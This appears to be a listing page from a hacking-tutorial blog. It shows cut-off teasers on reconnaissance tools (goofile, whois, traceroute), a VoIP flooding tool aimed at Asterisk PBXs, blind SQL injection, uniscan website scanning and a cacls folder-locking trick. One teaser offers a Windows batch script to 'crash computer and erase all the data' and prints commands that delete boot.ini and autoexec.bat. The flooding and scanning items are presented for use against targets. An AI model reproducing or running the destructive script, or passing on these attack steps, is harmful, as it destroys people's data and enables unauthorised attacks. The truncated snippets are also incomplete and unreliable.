goofile tool

goofile tool In this tool you can find the specific file in the domain. you can just install this tool in your terminal and use it. below example from how to use this tool.   Install this tool in your kali linux system   goofile – Command line filetype search     Search for files


Traceroute is a packet-tracking tool that is available for most operating systems. It operates by sending an Internet Control Message Protocol (ICMP) echo to each hop (router or gateway) along the path, until the destination address is reached. When ICMP messages are sent back from the router, the time to live (TTL) is decremented by one for each

iaxflood tool in kali linux

A UDP Inter-Asterisk_eXchange (i.e. IAX) packet was captured from an IAX channel between two Asterisk IP PBX’s. The content of that packet is the source of the payload for the attack embodied by this tool. While the IAX protocol header might not match the Asterisk PBX you’ll attack with this tool, it may require more

whois lookup

A very simple but effective means for collecting additional information about our target is Whois. The Whois service allows us to access specific information about our target including the IP addresses or host names of the company’s Domain Name Systems (DNS) servers and contact information usually containing an address and phone number. Whois is built into the Linux

make a private folder

To make Private folder which nobody can open, delete, see properties, rename. To make such a folder you need to make a folder with any name. For example – parth on desktop. And then open command prompt and then type the following command on the screen. cd desktop   Then type cacls folder /E /P

Crash your computer

Hello , In this tutorials i am teach you how to crash computer and erase all the data . 1 ) Open Notepad and copy-paste this code . 2 ) Below the code you have copy . @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r

sql Injection

What is blind Sql injection ? Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a

Find the website’s vulnerabilities

Find the website’s vulnerabilities . 1 ) open terminal in kali linux 2 ) Type uniscan in terminal 3 ) then type this command for the scan the website is vulnerable or not uniscan -u -qewds then hit enter . the process will be start and all the information from the website or their